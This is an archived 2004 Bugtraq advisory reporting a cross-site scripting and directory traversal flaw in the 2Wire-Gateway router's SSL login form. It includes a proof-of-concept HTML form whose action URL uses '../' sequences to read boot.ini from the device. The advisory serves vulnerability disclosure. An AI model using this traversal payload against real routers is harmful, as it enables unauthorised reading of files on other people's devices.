lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 20 Jan 2004 23:14:03 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: <bugtraq@...urityfocus.com>
Subject: 2Wire-Gateway Cross Site Scripting and Directory Transversal bug in SSL Form


#######################################################################

Application:    2Wire-Gateway/WebGateway
Vendor:           http://www.2wire.com
Versions:        All
Platforms:       Windows
Bug:          Cross Site Scripting and Directory traversal bug in SSL Form
Authentification
Risk:                high
Exploitation:   Remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@...l.com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============

2Wire is a communication company that sells internet and network related
devices, such
as routers. 2Wire most common routers webserver is "2Wire-Gateway". It
includes a SSL
(Secure Sockets Layer) form authentification.


#######################################################################

======
2) Bug
======

The SSL (Secure Sockets Layer) form authentification has a XSS(Cross Site
Scripting)
that allows an attacker to change the forms action parameters. An attacker
is able to inject script
and urls into the forms action an by that Transverse Directories on the
server.
This allows him to see and download any file in the remote system knowing
the path.
How ever exploiting this vulnerabillity is very hard because the attacker
has to connect
to the target through the browser and accept the SSL connection , exploit is
very hard to reproduce.

#######################################################################

===========
3) The Code
===========

<form name="wralogin" method="get"
action="http://<host>/wra/public/wralogin/?error=61&return=password/../../..
/../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ